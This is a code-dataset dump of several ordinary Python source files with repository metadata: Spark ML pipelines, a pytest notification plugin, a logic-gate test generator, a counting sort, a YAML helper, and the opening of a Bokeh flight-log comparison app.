hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c5bb01946303877ea63e29bebf7b652741dee0f9 | 5,170 | py | Python | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | 1 | 2022-01-11T08:24:26.000Z | 2022-01-11T08:24:26.000Z | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | null | null | null | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | null | null | null | # sklearn core
from pyspark.ml import Pipeline
# Preprocessing
from pyspark.ml.feature import StandardScaler, MaxAbsScaler, PCA, VectorAssembler, Imputer, OneHotEncoder
# Models
from pyspark.ml.regression import LinearRegression
from pyspark.ml.classification import LogisticRegression, RandomForestClassifier, LinearSVC, NaiveBayes, MultilayerPerceptronClassifier
def get_clf(mode, **kwargs):
'''
Code returning mllib classifier for pipelines
'''
if mode == 'logistic':
max_iter = kwargs.get('max_iter', 5)
model = LogisticRegression(featuresCol="transformed_features", maxIter=max_iter)
elif mode=='RandomForest':
n_estimators = kwargs.get('n_estimators', 5)
model = RandomForestClassifier(featuresCol="transformed_features", numTrees=n_estimators)
elif mode=='LinearSVC':
max_iter = kwargs.get('max_iter', 5)
model = LinearSVC(featuresCol="transformed_features", maxIter=max_iter)
elif mode=='NB':
model = NaiveBayes(featuresCol="transformed_features")
elif mode=='linear':
model = LinearRegression(featuresCol="transformed_features")
elif 'NN' in mode:
solver = kwargs.get('solver', 'sgd')
hidden_layer_sizes = kwargs.get('hidden_layer_sizes', (20,))
if isinstance(hidden_layer_sizes, list):
hidden_layer_sizes = list(hidden_layer_sizes)
activation = kwargs.get('activation', 'relu')
learning_rate_init = kwargs.get('learning_rate', 0.001)
max_iter = kwargs.get('max_iter', 5000)
if mode=='NN':
model = MultilayerPerceptronClassifier(solver=solver, layers=hidden_layer_sizes, stepSize=learning_rate_init,
maxIter=max_iter)
return model
def get_pipe_ops(mode, inputCol="features", outputCol="transformed_features"):
if mode == 'pipe_0':
# just the classifier
vecAssembler = VectorAssembler(outputCol=outputCol)
vecAssembler.setInputCols([inputCol])
ops = [vecAssembler]
elif mode == 'pipe_1':
# 1-step scaler (*map)
scaler = MaxAbsScaler(inputCol=inputCol, outputCol=outputCol)
ops = [scaler]
# elif mode == 'pipe_2':
# 2-step function scaler (*map)
# def logVar(x):
# return MaxAbsScaler(np.log(x))
# ops = [('logscaler', FunctionTransformer(logVar))]
elif mode == 'pipe_3':
# dimensionality reduction (*map)
pca = PCA(k=2, inputCol=inputCol, outputCol=outputCol)
ops = [pca]
# elif mode == 'pipe_4':
# k-means (fork)
# union = FeatureUnion([("indicator", MissingIndicator()),
# ("kmeans", KMeans(random_state=0))])
# ops = [('union', union)]
elif mode == 'pipe_5':
# TODO
# multiple dimensionality reductions (fork)
pca = PCA(k=2, inputCol=inputCol, outputCol="pca_output")
#svd = SVD()
#lda = LDA()
vecAssembler = VectorAssembler(outputCol=outputCol)
vecAssembler.setInputCols(["pca_output"])
ops = [pca, vecAssembler]
# elif mode == 'pipe_6':
# # image blurring operator
# grayify = RGB2GrayTransformer()
# def gaussian_blur(x):
# return skimage.filters.gaussian(x)
# ops = [('grayify', grayify), ('blur', FunctionTransformer(gaussian_blur))]
# elif mode == 'pipe_7':
# # complex image processing operators
# grayify = RGB2GrayTransformer()
# hogify = HogTransformer(
# pixels_per_cell=(4, 4),
# cells_per_block=(2,2),
# orientations=9,
# block_norm='L2-Hys'
# )
# ops = [('grayify', grayify), ('hogify', hogify)]
else:
raise ValueError("Invalid mode!")
return ops
def create_numerical_pipeline(ops_mode, imputer=True, clf_mode='logistic', **kwargs):
ops = get_pipe_ops(ops_mode)
clf = get_clf(clf_mode, **kwargs)
# vecAssembler = VectorAssembler(outputCol="data")
# vecAssembler.setInputCols(["col_0", "col_1", "col_2", "col_3", "col_4", "col_5", "col_6", "col_7", "col_8", "col_9", "col_10", "col_11", "col_12", "col_13"])
# ops = [vecAssembler] + ops
if imputer:
imp = Imputer(strategy='mean')
ops = [imp] + ops
ops = ops + [clf]
pipe = Pipeline(stages=ops)
return pipe
def create_tabular_pipeline(num_mode, outputCols="output", categorical_ix=["cat_features"], numerical_ix=["num_features"], imputer=True, clf_mode='logistic', **kwargs):
num_ops = get_pipe_ops(num_mode, outputCols=outputCols)
# imp = Imputer(strategy='categorical') - mllib doesn't support categorical input
cat_one_hot = OneHotEncoder(inputCols=categorical_ix, outputCols="cat_features")
ops = [cat_one_hot] + num_ops
if imputer:
num_imputer = Imputer(inputCols=numerical_ix, strategy='median', outputCols='data')
ops = [num_imputer] + ops
clf = get_clf(clf_mode)
vecAssembler = VectorAssembler(outputCols=outputCols)
vecAssembler.setInputCols(["cat_output"])
ops = ops + [clf]
pipe = Pipeline(stages=ops)
return pipe | 38.014706 | 168 | 0.640426 | 560 | 5,170 | 5.726786 | 0.305357 | 0.02744 | 0.026193 | 0.014967 | 0.208918 | 0.183661 | 0.113502 | 0.07546 | 0.024945 | 0 | 0 | 0.013118 | 0.233269 | 5,170 | 136 | 169 | 38.014706 | 0.795913 | 0.271373 | 0 | 0.169014 | 0 | 0 | 0.107249 | 0 | 0 | 0 | 0 | 0.007353 | 0 | 1 | 0.056338 | false | 0 | 0.056338 | 0 | 0.169014 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5bc2406eeec880f5701a8eed1c391df551334b5 | 2,927 | py | Python | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | 2 | 2020-08-27T03:14:05.000Z | 2020-10-24T17:17:36.000Z | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | 5 | 2019-12-02T08:49:15.000Z | 2020-06-22T08:38:34.000Z | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | null | null | null | # Copyright (c) 2019 Leiden University Medical Center
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from _pytest.config.argparsing import Parser as PytestParser
import pytest
from .notifications import DEFAULT_FAIL_ICON, DEFAULT_SUCCESS_ICON, notify
from .sound import DEFAULT_FAIL_SOUND, DEFAULT_SUCCESS_SOUND, play_sound
def pytest_addoption(parser: PytestParser):
"""
Add options to the pytest parser. Works like the built-in argparse module.
This function is used by pytest. It is not meant to be called from outside.
"""
parser.addoption("--notify", action="store_true",
help="Sends a desktop notification when pytest is "
"finished. (Only implemented on Linux. Requires the "
"'notify-send' program in PATH on Linux.")
parser.addoption("--sound", "--play-sound", action="store_true",
help="Plays a sound when pytest is finished. (Only "
"implemented on Linux and Macintosh systems).")
parser.addoption("--disturb", action="store_true",
help="Alias for --notify --sound")
def pytest_sessionfinish(session: pytest.Session, exitstatus: int):
"""
Hook function used by pytest. This code will be run at the end of a
pytest session.
"""
notify_on = session.config.getoption("notify")
sound_on = session.config.getoption("sound")
disturb = session.config.getoption("disturb")
if notify_on or disturb:
if exitstatus == 0:
notify("Pytest", "All tests are succesfull!",
icon=DEFAULT_SUCCESS_ICON)
else:
notify("Pytest", "Failing tests detected!",
icon=DEFAULT_FAIL_ICON)
if sound_on or disturb:
if exitstatus == 0:
play_sound(DEFAULT_SUCCESS_SOUND)
else:
play_sound(DEFAULT_FAIL_SOUND)
| 42.42029 | 79 | 0.69081 | 385 | 2,927 | 5.176623 | 0.433766 | 0.044155 | 0.022579 | 0.0286 | 0.066232 | 0.066232 | 0.042148 | 0.042148 | 0 | 0 | 0 | 0.002677 | 0.23437 | 2,927 | 68 | 80 | 43.044118 | 0.886658 | 0.446874 | 0 | 0.133333 | 0 | 0 | 0.251601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5bc9b2009bdf6d2e3701fee56d0333e0b92d2e8 | 379 | py | Python | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | 5 | 2020-02-26T16:53:04.000Z | 2020-02-27T06:12:46.000Z | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | null | null | null | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | 2 | 2020-02-26T16:53:15.000Z | 2020-02-28T03:45:56.000Z | from src.TestCaseGenerator import *
input_variables = [Var("a", 1, "B"), Var("b", 1, "B")]
output_variables = [Var("out", 1, "B")]
def or_logic(args):
out = []
if args[0] == 1 or args[1] == 1:
out.append(1)
else:
out.append(0)
return out
generate(name="Or", numCases=10, inVars=input_variables, outVars=output_variables, function=or_logic)
| 19.947368 | 101 | 0.612137 | 56 | 379 | 4.035714 | 0.5 | 0.026549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036667 | 0.208443 | 379 | 18 | 102 | 21.055556 | 0.716667 | 0 | 0 | 0 | 0 | 0 | 0.026525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5be570abca3ed89a78ad5032997c2885276882c | 1,129 | py | Python | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""
l0m1s
lukes1582@gmail.com
algoritmo counting sort sviluppato per Python
"""
arr = [50, 1000, 0, 43, 8, 5, 1, 10]
print(arr)
maxElement = int(max(arr))
minElement = int(min(arr))
rangeOfElements = maxElement - minElement + 1
"""
per prima cosa assegno 0 a tutti gli elementi dell'array count_arr che è esattamente
lungo quanto calcolato in precedenza
"""
count_arr = [0 for _ in range(rangeOfElements)]
"""
poi procedo ad assegnare 0 a tutti gli elementi dell'array output_arr che ha una grandezza
paritetica a quella dell'array da ordinare
"""
output_arr = [0 for _ in range(len(arr))]
for h in range(0, len(arr)):
count_arr[arr[h]-minElement] += 1 # assegno 1 nel count_arr nella posizione definita dal valore preso dell'arr - il valore minimo
for k in range(1, len(count_arr)):
count_arr[k] += count_arr[k-1]
for j in range(len(arr)-1, -1, -1):
output_arr[count_arr[arr[j] - minElement] - 1] = arr[j]
count_arr[arr[j] - minElement] -= 1
print(output_arr)
for w in range(0, len(arr)):
arr[w] = output_arr[w]
print(arr)
| 24.543478 | 136 | 0.669619 | 183 | 1,129 | 4.043716 | 0.415301 | 0.097297 | 0.044595 | 0.027027 | 0.210811 | 0.135135 | 0.072973 | 0 | 0 | 0 | 0 | 0.041433 | 0.209035 | 1,129 | 45 | 137 | 25.088889 | 0.787234 | 0.165633 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c0dc125aaf6279807b7ce72e48ebe44653590d | 3,434 | py | Python | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/env python2.7
# vim : set fileencoding=utf-8 expandtab noai ts=4 sw=4 filetype=python :
"""
embeddedfactor GmbH 2015
Implements yaml loading and storring
"""
from __future__ import print_function
import sys
import stitch.datastore
import types
import itertools
from ruamel import yaml
from ruamel import ordereddict
from ruamel.yaml.comments import CommentedMap
from ruamel.yaml import scalarstring
FILE_PROPERTY = "file"
FILE_EXTENSION = ".yaml"
class Query(object):
"""Query object"""
def __init__(self, query):
"""
Store query string
"""
self.query = query
def __repr__(self):
"""
Print string representation of the query
"""
return "!query:"+self.query
def get_query(self):
"""
Return the query string
"""
return self.query
def query_constructor(loader, node):
"""
Convert node as scalar from loader to a Query object
"""
value = loader.construct_scalar(node)
return Query(value)
yaml.add_constructor(u'!query', query_constructor, yaml.RoundTripLoader)
def query_representer(dumper, data):
"""
Convert Query object to a query string with tag
"""
return dumper.represent_scalar(u'!query', data.query)
yaml.add_representer(Query, query_representer, yaml.RoundTripDumper)
class folded_str(unicode): pass
def folded_str_representer(dumper, data):
"""
Converts all folded_str instances to strings folded in YAML with the > style
"""
return dumper.represent_scalar(u'tag:yaml.org,2002:str', data, style='>')
yaml.add_representer(folded_str, folded_str_representer, yaml.RoundTripDumper)
class literal_str(unicode): pass
def literal_str_representer(dumper, data):
"""
Converts all literal_str instances to strings in YAML with the | style
"""
return dumper.represent_scalar(u'tag:yaml.org,2002:str', data, style='|')
yaml.add_representer(literal_str, literal_str_representer, yaml.RoundTripDumper)
def load(filename):
"""Load a dict from a yaml file"""
try:
result = {}
with open(filename, "r") as stream:
result = yaml.load(stream.read(), yaml.RoundTripLoader)
if isinstance(result, ordereddict.ordereddict):
result.insert(0, FILE_PROPERTY, filename)
elif isinstance(result, dict):
result[FILE_PROPERTY] = filename
except yaml.reader.ReaderError as err:
print("Error in file:", filename)
print(err.message())
sys.exit(1)
except yaml.scanner.ScannerError as err:
print("Error in file {filename} ".format(filename=filename), err)
sys.exit(1)
except yaml.parser.ParserError as err:
print("Error in file {filename} ".format(filename=filename), err)
sys.exit(1)
return result
def save(obj, filename=None):
"""Save a dict to a yaml file"""
if not filename and FILE_PROPERTY in obj:
filename = obj[FILE_PROPERTY]
del obj[FILE_PROPERTY]
if not filename:
raise Exception()
with open(filename, "w") as stream:
stream.write(yaml.dump(obj, Dumper=yaml.RoundTripDumper))
def dump(obj):
"""Dump a dict as yaml into a string"""
if isinstance(obj, types.GeneratorType):
obj = tuple(obj)
elif isinstance(obj, itertools.chain):
obj = list(obj)
return u"---\n"+yaml.dump(obj, Dumper=yaml.RoundTripDumper)
| 30.122807 | 80 | 0.672976 | 439 | 3,434 | 5.157175 | 0.302961 | 0.031802 | 0.027827 | 0.035777 | 0.234541 | 0.209806 | 0.147085 | 0.134276 | 0.134276 | 0.134276 | 0 | 0.007848 | 0.220734 | 3,434 | 113 | 81 | 30.389381 | 0.838191 | 0.172685 | 0 | 0.074627 | 0 | 0 | 0.053338 | 0.015666 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149254 | false | 0.029851 | 0.134328 | 0 | 0.447761 | 0.074627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c2ac94d668415c7b3c3caf90147a017c256922 | 27,466 | py | Python | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | null | null | null | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | null | null | null | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | 1 | 2021-03-03T18:51:57.000Z | 2021-03-03T18:51:57.000Z | """ This contains Thiel analysis plots """
from os import read, path
# import px4tools
import numpy as np
import math
import io
import os
import sys
import errno
import base64
from db_entry import *
import pickle
import simstats # this the module that you can modify to add your own stats
#import thiel_analysis
from bokeh.io import curdoc,output_file, show
from bokeh.models.widgets import Div
from bokeh.models import Title
from bokeh.layouts import column
from scipy.interpolate import interp1d
from plotted_tables import *
from configured_plots import *
from os.path import dirname, join
from config import *
from colors import HTML_color_to_RGB
from helper import *
from leaflet import ulog_to_polyline
from bokeh.models import RadioButtonGroup, Button
from bokeh.models.widgets import Paragraph
import pandas as pd
pd.options.mode.chained_assignment = None # default='warn'
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, PreText, Select
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
from bokeh.application.handlers import DirectoryHandler
#pylint: disable=cell-var-from-loop, undefined-loop-variable,
default_simname = 'sim.ulg' # these are the defaults if you don't load your own data
default_realname = 'real.ulg'
simdescription = '(Dummy data. Please select your own sim log above)'
realdescription = '(Dummy data. Please select your own real log above)'
sim_polarity = 1 # determines if we should reverse the Y data
real_polarity = 1
simx_offset = 0
realx_offset = 0
realnorm = 0
simnorm = 0
read_file = True
get_new_data = True
reverse_sim_data = False
reverse_real_data = False
refresh = False
read_file_local = False
new_real = False
new_sim = False
mission_only = False
sim_metric = 'x'
real_metric = 'x'
tplot_height = 400
tplot_width = 1000
keys = []
labels_text = []
labels_color = []
labels_y_pos = []
labels_x_pos = []
annotations = []
mission_annotations = []
labels = []
sim_label = Label()
real_label = Label()
annotation_counter = 0
mission_annotation_counter = 0
config = [default_simname, default_realname, sim_metric, real_metric, simdescription, realdescription, 1, 1] # this is just a placeholder in case you don't already have
# def kill():
# # this is just for debugging. It creates an error so we can watch crash handling
# sys.exit()
# # raise RuntimeError("Fake error")
# kill_mode_button = Button(label="Kill") # This is just a debugging tool to make sure the web app can handle crashes
# kill_mode_button.on_click(kill)
mission_mode_button = RadioButtonGroup(
labels=["Show all flight modes", "Show only Mission mode"], active=0)
mission_mode_button.on_change('active', lambda attr, old, new: mission_mode())
normalize_mode_button = RadioButtonGroup(
labels=["Raw data", "Normalized data"], active=0)
normalize_mode_button.on_change('active', lambda attr, old, new: normalize())
sim_reverse_button = RadioButtonGroup(
labels=["Sim Default Orientation", "Reversed Orientation"], active=0)
sim_reverse_button.on_change('active', lambda attr, old, new: reverse_sim())
real_reverse_button = RadioButtonGroup(
labels=["Real Default Orientation", "Reversed Orientation"], active=0)
real_reverse_button.on_change('active', lambda attr, old, new: reverse_real())
sim_swap_button = RadioButtonGroup(
labels=["Sim Default X/Y", "Swapped X/Y"], active=0)
sim_swap_button.on_change('active', lambda attr, old, new: swap_sim())
real_swap_button = RadioButtonGroup(
labels=["Real Default X/Y", "Swapped X/Y"], active=0)
real_swap_button.on_change('active', lambda attr, old, new: swap_real())
spacer = Div(text="<hr>", width=800, height=20)
explainer = Div(text="<b>Note:</b> the X/Y coordinate system is set relatively arbitrarily by the drone at startup \
and does not reflect GPS positions or compass direction. So you may find that you need to \
compare one file's X with another's Y or reverse one to achieve alignment. ", width=800, height=50)
# set up widgets
stats = PreText(text='Thiel Coefficient', width=500)
# datatype = Select(value='XY', options=DEFAULT_FIELDS)
stats2 = PreText(text='Song Coefficient', width=500)
# @lru_cache()
def load_data(filename):
global keys
fname = os.path.join(get_log_filepath(), filename)
if path.exists(fname):
ulog = load_ulog_file(fname)
else:
print("log does not exist; loading default data instead")
fname = os.path.join(get_log_filepath(), 'sim.ulg')
ulog = load_ulog_file(fname)
data = ulog.data_list
for d in data:
data_keys = [f.field_name for f in d.field_data]
data_keys.remove('timestamp')
keys.append(data_keys)
cur_dataset = ulog.get_dataset('vehicle_local_position')
flight_mode_changes = get_flight_mode_changes(ulog)
return cur_dataset, flight_mode_changes
# @lru_cache()
def get_data(simname,realname, sim_metric, real_metric, read_file):
global dfsim, dfreal, sim_flight_mode_changes, real_flight_mode_changes
if read_file:
dfsim, sim_flight_mode_changes = load_data(simname)
dfreal, real_flight_mode_changes = load_data(realname)
read_file = False
sim_data = dfsim.data[sim_metric].copy() # we copy the data so we can change it wihout changing the original
sim_time = dfsim.data['timestamp'].copy()
real_data = dfreal.data[real_metric].copy()
real_time = dfreal.data['timestamp'].copy()
if mission_only: # only show data for when the drone is in auto modes
temp_pd_sim = pd.DataFrame(sim_data, columns = ['sim']) # create one dataframe that's just the flight data for the selected metric
sim_mission_start, sim_mission_end = get_mission_mode(sim_flight_mode_changes)
pd_sim_time = pd.DataFrame(sim_time,columns = ['time'])
temp_pd_sim = pd.concat([pd_sim_time,temp_pd_sim], axis=1)
pd_sim2 = temp_pd_sim.loc[(temp_pd_sim['time'] >= sim_mission_start) & (temp_pd_sim['time'] <= sim_mission_end)] #slice this just to the mission portion
pd_sim = pd_sim2.copy()
starting_sim_time = pd_sim.iat[0,0]
pd_sim['time'] -= starting_sim_time # zero base the time
pd_sim_time['time'] = pd_sim['time']
pd_sim = pd_sim.drop(columns=['time']) # we don't need these old time columns anymore
temp_pd_real = pd.DataFrame(real_data, columns = ['real'])
real_mission_start, real_mission_end = get_mission_mode(real_flight_mode_changes)
pd_real_time = pd.DataFrame(real_time, columns = ['time'])
temp_pd_real = pd.concat([pd_real_time,temp_pd_real], axis=1)
# print("Real mission start, finish", real_mission_start,real_mission_end)
pd_real2 = temp_pd_real.loc[(temp_pd_real['time'] >= real_mission_start) & (temp_pd_real['time'] <= real_mission_end)] # slice this just to the mission portion
pd_real = pd_real2.copy()
starting_real_time = pd_real.iat[0,0]
pd_real['time'] -= starting_real_time # zero base the time
pd_real_time['time'] = pd_real['time']
pd_real = pd_real.drop(columns=['time']) # we don't need these old time columns anymore
else:
pd_sim = pd.DataFrame(sim_data, columns = ['sim'])
pd_sim_time = pd.DataFrame(sim_time,columns = ['time'])
starting_sim_time = pd_sim_time.iat[0,0]
pd_sim_time['time'] -= starting_sim_time # zero base the time
pd_real = pd.DataFrame(real_data, columns = ['real'])
pd_real_time = pd.DataFrame(real_time, columns = ['time'])
starting_real_time = pd_real_time.iat[0,0]
pd_real_time['time'] -= starting_real_time # zero base the time
pd_real_time.dropna(subset=['time'], inplace=True) # remove empty rows
pd_real.reset_index(drop=True, inplace=True) # reset all the indicies to zero
pd_real_time.reset_index(drop=True, inplace=True)
pd_sim_time.dropna(subset=['time'], inplace=True) # do the same for the sims
pd_sim.reset_index(drop=True, inplace=True)
pd_sim_time.reset_index(drop=True, inplace=True)
if len(pd_sim_time) > len(pd_real_time): # base the y axis on the longest time
pd_time = pd_sim_time
else:
pd_time = pd_real_time
new_data = pd.concat([pd_time,pd_sim, pd_real], axis=1)
save_settings(config)
return new_data
def update_config():
config[0] = simname
